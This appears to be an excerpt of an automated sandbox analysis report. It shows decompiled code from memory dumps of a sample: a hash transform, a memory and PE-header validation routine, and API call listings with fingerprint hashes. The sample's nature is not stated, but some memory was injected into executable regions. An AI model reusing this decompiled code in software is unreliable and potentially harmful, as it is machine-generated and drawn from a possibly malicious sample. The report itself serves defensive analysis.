                                                            				signed int _t745;
                                                            				signed int _t747;
                                                            
                                                            				_t226 = _a4;
                                                            				_t347 = __ecx + 2;
                                                            				_t681 =  &_v76;
                                                            				_t447 = 0x10;
                                                            				do {
                                                            					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                            					_t347 = _t347 + 4;
                                                            					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                            					_t681 =  &(_t681[1]);
                                                            					_t447 = _t447 - 1;
                                                            				} while (_t447 != 0);
                                                            				_t6 = _t226 + 4; // 0x14eb3fc3
                                                            				_t682 =  *_t6;
                                                            				_t7 = _t226 + 8; // 0x8d08458b
                                                            				_t407 =  *_t7;
                                                            				_t8 = _t226 + 0xc; // 0x56c1184c
                                                            				_t348 =  *_t8;
                                                            				asm("rol eax, 0x7");
                                                            				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                            				asm("rol ecx, 0xc");
                                                            				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                            				asm("ror edx, 0xf");
                                                            				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                            				asm("ror esi, 0xa");
                                                            				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                            				_v8 = _t684;
                                                            				_t689 = _v8;
                                                            				asm("rol eax, 0x7");
                                                            				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                            				asm("rol ecx, 0xc");
                                                            				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                            				asm("ror edx, 0xf");
                                                            				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                            				asm("ror esi, 0xa");
                                                            				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                            				_v8 = _t691;
                                                            				_t696 = _v8;
                                                            				asm("rol eax, 0x7");
                                                            				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                            				asm("rol ecx, 0xc");
                                                            				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                            				asm("ror edx, 0xf");
                                                            				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                            				asm("ror esi, 0xa");
                                                            				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                            				_v8 = _t698;
                                                            				asm("rol eax, 0x7");
                                                            				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                            				asm("rol ecx, 0xc");
                                                            				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                            				_t507 =  !_t356;
                                                            				asm("ror edx, 0xf");
                                                            				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                            				_v12 = _t415;
                                                            				_v12 =  !_v12;
                                                            				asm("ror esi, 0xa");
                                                            				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                            				asm("rol eax, 0x5");
                                                            				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                            				asm("rol ecx, 0x9");
                                                            				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                            				asm("rol edx, 0xe");
                                                            				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                            				asm("ror esi, 0xc");
                                                            				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                            				asm("rol eax, 0x5");
                                                            				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                            				asm("rol ecx, 0x9");
                                                            				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                            				asm("rol edx, 0xe");
                                                            				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                            				asm("ror esi, 0xc");
                                                            				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                            				asm("rol eax, 0x5");
                                                            				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                            				asm("rol ecx, 0x9");
                                                            				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                            				asm("rol edx, 0xe");
                                                            				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                            				asm("ror esi, 0xc");
                                                            				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                            				asm("rol eax, 0x5");
                                                            				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                            				asm("rol ecx, 0x9");
                                                            				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                            				asm("rol edx, 0xe");
                                                            				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                            				asm("ror esi, 0xc");
                                                            				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                            				asm("rol eax, 0x4");
                                                            				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                            				asm("rol ecx, 0xb");
                                                            				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                            				asm("rol edx, 0x10");
                                                            				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                            				_t598 = _t366 ^ _t425;
                                                            				asm("ror esi, 0x9");
                                                            				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                            				asm("rol eax, 0x4");
                                                            				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                            				asm("rol edi, 0xb");
                                                            				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                            				asm("rol edx, 0x10");
                                                            				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                            				_t337 = _t606 ^ _t427;
                                                            				asm("ror ecx, 0x9");
                                                            				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                            				asm("rol eax, 0x4");
                                                            				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                            				asm("rol esi, 0xb");
                                                            				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                            				asm("rol edi, 0x10");
                                                            				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                            				_t429 = _t733 ^ _t612;
                                                            				asm("ror ecx, 0x9");
                                                            				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                            				asm("rol eax, 0x4");
                                                            				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                            				asm("rol edx, 0xb");
                                                            				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                            				asm("rol esi, 0x10");
                                                            				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                            				asm("ror ecx, 0x9");
                                                            				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                            				asm("rol eax, 0x6");
                                                            				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                            				asm("rol edx, 0xa");
                                                            				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                            				asm("rol esi, 0xf");
                                                            				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                            				asm("ror ecx, 0xb");
                                                            				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                            				asm("rol eax, 0x6");
                                                            				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                            				asm("rol edx, 0xa");
                                                            				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                            				asm("rol esi, 0xf");
                                                            				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                            				asm("ror ecx, 0xb");
                                                            				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                            				asm("rol eax, 0x6");
                                                            				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                            				asm("rol edx, 0xa");
                                                            				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                            				asm("rol esi, 0xf");
                                                            				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                            				asm("ror edi, 0xb");
                                                            				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                            				asm("rol eax, 0x6");
                                                            				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                            				asm("rol edx, 0xa");
                                                            				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                            				_t399 = _a4;
                                                            				asm("rol esi, 0xf");
                                                            				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                            				 *_t399 =  *_t399 + _t259;
                                                            				asm("ror eax, 0xb");
                                                            				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                            				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                            				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                            				return memset( &_v76, 0, 0x40);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                                            • Instruction ID: 1e9214db6661724b81712010c077b3e11c760bc6eb13d00249c37af32882b6d1
                                                            • Opcode Fuzzy Hash: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                                            • Instruction Fuzzy Hash: 7022847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,?,00000000,000000FE), ref: 04564EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 701952b79a3eb0b7148b648e4870310f968767c9de0b6ca87eede3e28cc8a546
                                                            • Instruction ID: 8fcc9539ab8e3194b9f907983bab8a56809d208be1024abcb4b5d4f084a114f5
                                                            • Opcode Fuzzy Hash: 701952b79a3eb0b7148b648e4870310f968767c9de0b6ca87eede3e28cc8a546
                                                            • Instruction Fuzzy Hash: 20327B70A00209EFDF14CF58D5807AEBBF1FF85311F1485AAD856AB285E774EA41EB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD8055(long _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				signed int _v16;
                                                            				short* _v32;
                                                            				void _v36;
                                                            				void* _t57;
                                                            				signed int _t58;
                                                            				signed int _t61;
                                                            				signed int _t62;
                                                            				void* _t63;
                                                            				signed int* _t68;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				intOrPtr _t75;
                                                            				void* _t76;
                                                            				signed int _t77;
                                                            				void* _t78;
                                                            				void _t80;
                                                            				signed int _t81;
                                                            				signed int _t84;
                                                            				signed int _t86;
                                                            				short* _t87;
                                                            				void* _t89;
                                                            				signed int* _t90;
                                                            				long _t91;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				signed int _t100;
                                                            				signed int _t102;
                                                            				void* _t104;
                                                            				long _t108;
                                                            				signed int _t110;
                                                            
                                                            				_t108 = _a4;
                                                            				_t76 =  *(_t108 + 8);
                                                            				if((_t76 & 0x00000003) != 0) {
                                                            					L3:
                                                            					return 0;
                                                            				}
                                                            				_a4 =  *[fs:0x4];
                                                            				_v8 =  *[fs:0x8];
                                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                                            					_t102 =  *(_t108 + 0xc);
                                                            					__eflags = _t102 - 0xffffffff;
                                                            					if(_t102 != 0xffffffff) {
                                                            						_t91 = 0;
                                                            						__eflags = 0;
                                                            						_a4 = 0;
                                                            						_t57 = _t76;
                                                            						do {
                                                            							_t80 =  *_t57;
                                                            							__eflags = _t80 - 0xffffffff;
                                                            							if(_t80 == 0xffffffff) {
                                                            								goto L9;
                                                            							}
                                                            							__eflags = _t80 - _t91;
                                                            							if(_t80 >= _t91) {
                                                            								L20:
                                                            								_t63 = 0;
                                                            								L60:
                                                            								return _t63;
                                                            							}
                                                            							L9:
                                                            							__eflags =  *(_t57 + 4);
                                                            							if( *(_t57 + 4) != 0) {
                                                            								_t12 =  &_a4;
                                                            								 *_t12 = _a4 + 1;
                                                            								__eflags =  *_t12;
                                                            							}
                                                            							_t91 = _t91 + 1;
                                                            							_t57 = _t57 + 0xc;
                                                            							__eflags = _t91 - _t102;
                                                            						} while (_t91 <= _t102);
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L15:
                                                            							_t81 =  *0xdda330; // 0x0
                                                            							_t110 = _t76 & 0xfffff000;
                                                            							_t58 = 0;
                                                            							__eflags = _t81;
                                                            							if(_t81 <= 0) {
                                                            								L18:
                                                            								_t104 = _t102 | 0xffffffff;
                                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                            								__eflags = _t61;
                                                            								if(_t61 < 0) {
                                                            									_t62 = 0;
                                                            									__eflags = 0;
                                                            								} else {
                                                            									_t62 = _a4;
                                                            								}
                                                            								__eflags = _t62;
                                                            								if(_t62 == 0) {
                                                            									L59:
                                                            									_t63 = _t104;
                                                            									goto L60;
                                                            								} else {
                                                            									__eflags = _v12 - 0x1000000;
                                                            									if(_v12 != 0x1000000) {
                                                            										goto L59;
                                                            									}
                                                            									__eflags = _v16 & 0x000000cc;
                                                            									if((_v16 & 0x000000cc) == 0) {
                                                            										L46:
                                                            										_t63 = 1;
                                                            										 *0xdda378 = 1;
                                                            										__eflags =  *0xdda378;
                                                            										if( *0xdda378 != 0) {
                                                            											goto L60;
                                                            										}
                                                            										_t84 =  *0xdda330; // 0x0
                                                            										__eflags = _t84;
                                                            										_t93 = _t84;
                                                            										if(_t84 <= 0) {
                                                            											L51:
                                                            											__eflags = _t93;
                                                            											if(_t93 != 0) {
                                                            												L58:
                                                            												 *0xdda378 = 0;
                                                            												goto L5;
                                                            											}
                                                            											_t77 = 0xf;
                                                            											__eflags = _t84 - _t77;
                                                            											if(_t84 <= _t77) {
                                                            												_t77 = _t84;
                                                            											}
                                                            											_t94 = 0;
                                                            											__eflags = _t77;
                                                            											if(_t77 < 0) {
                                                            												L56:
                                                            												__eflags = _t84 - 0x10;
                                                            												if(_t84 < 0x10) {
                                                            													_t86 = _t84 + 1;
                                                            													__eflags = _t86;
                                                            													 *0xdda330 = _t86;
                                                            												}
                                                            												goto L58;
                                                            											} else {
                                                            												do {
                                                            													_t68 = 0xdda338 + _t94 * 4;
                                                            													_t94 = _t94 + 1;
                                                            													__eflags = _t94 - _t77;
                                                            													 *_t68 = _t110;
                                                            													_t110 =  *_t68;
                                                            												} while (_t94 <= _t77);
                                                            												goto L56;
                                                            											}
                                                            										}
                                                            										_t69 = 0xdda334 + _t84 * 4;
                                                            										while(1) {
                                                            											__eflags =  *_t69 - _t110;
                                                            											if( *_t69 == _t110) {
                                                            												goto L51;
                                                            											}
                                                            											_t93 = _t93 - 1;
                                                            											_t69 = _t69 - 4;
                                                            											__eflags = _t93;
                                                            											if(_t93 > 0) {
                                                            												continue;
                                                            											}
                                                            											goto L51;
                                                            										}
                                                            										goto L51;
                                                            									}
                                                            									_t87 = _v32;
                                                            									__eflags =  *_t87 - 0x5a4d;
                                                            									if( *_t87 != 0x5a4d) {
                                                            										goto L59;
                                                            									}
                                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                            									__eflags =  *_t71 - 0x4550;
                                                            									if( *_t71 != 0x4550) {
                                                            										goto L59;
                                                            									}
                                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                            										goto L59;
                                                            									}
                                                            									_t78 = _t76 - _t87;
                                                            									__eflags =  *((short*)(_t71 + 6));
                                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                                            										goto L59;
                                                            									}
                                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                            									__eflags = _t78 - _t72;
                                                            									if(_t78 < _t72) {
                                                            										goto L46;
                                                            									}
                                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                            										goto L46;
                                                            									}
                                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                            										goto L20;
                                                            									}
                                                            									goto L46;
                                                            								}
                                                            							} else {
                                                            								goto L16;
                                                            							}
                                                            							while(1) {
                                                            								L16:
                                                            								__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
                                                            								if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
                                                            									break;
                                                            								}
                                                            								_t58 = _t58 + 1;
                                                            								__eflags = _t58 - _t81;
                                                            								if(_t58 < _t81) {
                                                            									continue;
                                                            								}
                                                            								goto L18;
                                                            							}
                                                            							__eflags = _t58;
                                                            							if(_t58 <= 0) {
                                                            								goto L5;
                                                            							}
                                                            							 *0xdda378 = 1;
                                                            							__eflags =  *0xdda378;
                                                            							if( *0xdda378 != 0) {
                                                            								goto L5;
                                                            							}
                                                            							__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
                                                            							if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
                                                            								L32:
                                                            								_t100 = 0;
                                                            								__eflags = _t58;
                                                            								if(_t58 < 0) {
                                                            									L34:
                                                            									 *0xdda378 = 0;
                                                            									goto L5;
                                                            								} else {
                                                            									goto L33;
                                                            								}
                                                            								do {
                                                            									L33:
                                                            									_t90 = 0xdda338 + _t100 * 4;
                                                            									_t100 = _t100 + 1;
                                                            									__eflags = _t100 - _t58;
                                                            									 *_t90 = _t110;
                                                            									_t110 =  *_t90;
                                                            								} while (_t100 <= _t58);
                                                            								goto L34;
                                                            							}
                                                            							_t25 = _t81 - 1; // -1
                                                            							_t58 = _t25;
                                                            							__eflags = _t58;
                                                            							if(_t58 < 0) {
                                                            								L28:
                                                            								__eflags = _t81 - 0x10;
                                                            								if(_t81 < 0x10) {
                                                            									_t81 = _t81 + 1;
                                                            									__eflags = _t81;
                                                            									 *0xdda330 = _t81;
                                                            								}
                                                            								_t28 = _t81 - 1; // 0x0
                                                            								_t58 = _t28;
                                                            								goto L32;
                                                            							} else {
                                                            								goto L25;
                                                            							}
                                                            							while(1) {
                                                            								L25:
                                                            								__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
                                                            								if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
                                                            									break;
                                                            								}
                                                            								_t58 = _t58 - 1;
                                                            								__eflags = _t58;
                                                            								if(_t58 >= 0) {
                                                            									continue;
                                                            								}
                                                            								break;
                                                            							}
                                                            							__eflags = _t58;
                                                            							if(__eflags >= 0) {
                                                            								if(__eflags == 0) {
                                                            									goto L34;
                                                            								}
                                                            								goto L32;
                                                            							}
                                                            							goto L28;
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                            						__eflags = _t75 - _v8;
                                                            						if(_t75 < _v8) {
                                                            							goto L20;
                                                            						}
                                                            						__eflags = _t75 - _t108;
                                                            						if(_t75 >= _t108) {
                                                            							goto L20;
                                                            						}
                                                            						goto L15;
                                                            					}
                                                            					L5:
                                                            					_t63 = 1;
                                                            					goto L60;
                                                            				} else {
                                                            					goto L3;
                                                            				}
			}
                                                            0x00dd81ab
                                                            0x00dd81b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81b9
                                                            0x00dd81bb
                                                            0x00dd81c1
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81c7
                                                            0x00dd81cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81d3
                                                            0x00dd81d5
                                                            0x00dd81de
                                                            0x00dd81e2
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81e8
                                                            0x00dd81eb
                                                            0x00dd81ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81f4
                                                            0x00dd81f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81f8
                                                            0x00dd81fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80e7
                                                            0x00dd80e7
                                                            0x00dd80e7
                                                            0x00dd80ee
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80f0
                                                            0x00dd80f1
                                                            0x00dd80f3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80f3
                                                            0x00dd811b
                                                            0x00dd811d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd812d
                                                            0x00dd812f
                                                            0x00dd8131
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8137
                                                            0x00dd813e
                                                            0x00dd816a
                                                            0x00dd816a
                                                            0x00dd816c
                                                            0x00dd816e
                                                            0x00dd8182
                                                            0x00dd8184
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8170
                                                            0x00dd8170
                                                            0x00dd8170
                                                            0x00dd8179
                                                            0x00dd817a
                                                            0x00dd817c
                                                            0x00dd817e
                                                            0x00dd817e
                                                            0x00000000
                                                            0x00dd8170
                                                            0x00dd8140
                                                            0x00dd8140
                                                            0x00dd8143
                                                            0x00dd8145
                                                            0x00dd8157
                                                            0x00dd8157
                                                            0x00dd815a
                                                            0x00dd815c
                                                            0x00dd815c
                                                            0x00dd815d
                                                            0x00dd815d
                                                            0x00dd8163
                                                            0x00dd8163
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8147
                                                            0x00dd8147
                                                            0x00dd8147
                                                            0x00dd814e
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8150
                                                            0x00dd8150
                                                            0x00dd8151
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8151
                                                            0x00dd8153
                                                            0x00dd8155
                                                            0x00dd8168
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8168
                                                            0x00000000
                                                            0x00dd8155
                                                            0x00dd80c7
                                                            0x00dd80ca
                                                            0x00dd80cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80cf
                                                            0x00dd80d1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80d1
                                                            0x00dd8096
                                                            0x00dd8098
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DD8106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: MemoryQueryVirtual
                                                            • String ID:
                                                            • API String ID: 2850889275-0
                                                            • Opcode ID: 071c3b502dda6b92ce5648f92f2e3dde132d4a1aa81c743a1d9a8dbd37b0f0af
                                                            • Instruction ID: 8d1a748db12cf4aec03d1a0c60daa7fb1c15814f189e73de990753a3d85006a9
                                                            • Opcode Fuzzy Hash: 071c3b502dda6b92ce5648f92f2e3dde132d4a1aa81c743a1d9a8dbd37b0f0af
                                                            • Instruction Fuzzy Hash: 1C61D330A007029FDB2BCF6DC88163977B6EB45354B28856BD856C7394EF31DC4AA674
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: cf8978d9d50053ee4d0660a6ae44a88e153db6143fa0ecd40754976b890c4928
                                                            • Instruction ID: c80415bcfb89ea36b5b8731b901037ac88e43b20fb3ab67b639b3e349b5ca10a
                                                            • Opcode Fuzzy Hash: cf8978d9d50053ee4d0660a6ae44a88e153db6143fa0ecd40754976b890c4928
                                                            • Instruction Fuzzy Hash: 67D17D34A0124ADFDF18CFA8D4965EEBBB1FF84304F24856DE853A7250E730A955EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0456D268
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: 5b572fb4d608250614a99f968054dd36dfaab0afa1c54266fab7f29d89aa6362
                                                            • Instruction ID: 3a8fa57fff01f52363a7b1c4a558b5b344d2b8c1f5da9315c097b42413e16775
                                                            • Opcode Fuzzy Hash: 5b572fb4d608250614a99f968054dd36dfaab0afa1c54266fab7f29d89aa6362
                                                            • Instruction Fuzzy Hash: 0A11A23220414DBFEF424E98ED41DEE7B7AFF48364B054619FE1962120C736E875AB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04579198
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorStatus
                                                            • String ID:
                                                            • API String ID: 1596131371-0
                                                            • Opcode ID: ffa4ae2727141afd4b36f6dd0dc0f1d31e7e727fe34d6b31f7e68c91be01d998
                                                            • Instruction ID: fa7b7a3dedbf27c33c1da1dbb5eb85fbf3698516a8925b8b6df412675e6889a0
                                                            • Opcode Fuzzy Hash: ffa4ae2727141afd4b36f6dd0dc0f1d31e7e727fe34d6b31f7e68c91be01d998
                                                            • Instruction Fuzzy Hash: 3FC012716082026FEA185A10E91DE2A7B15FB50340F00541CB04994070DF78A854E611
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
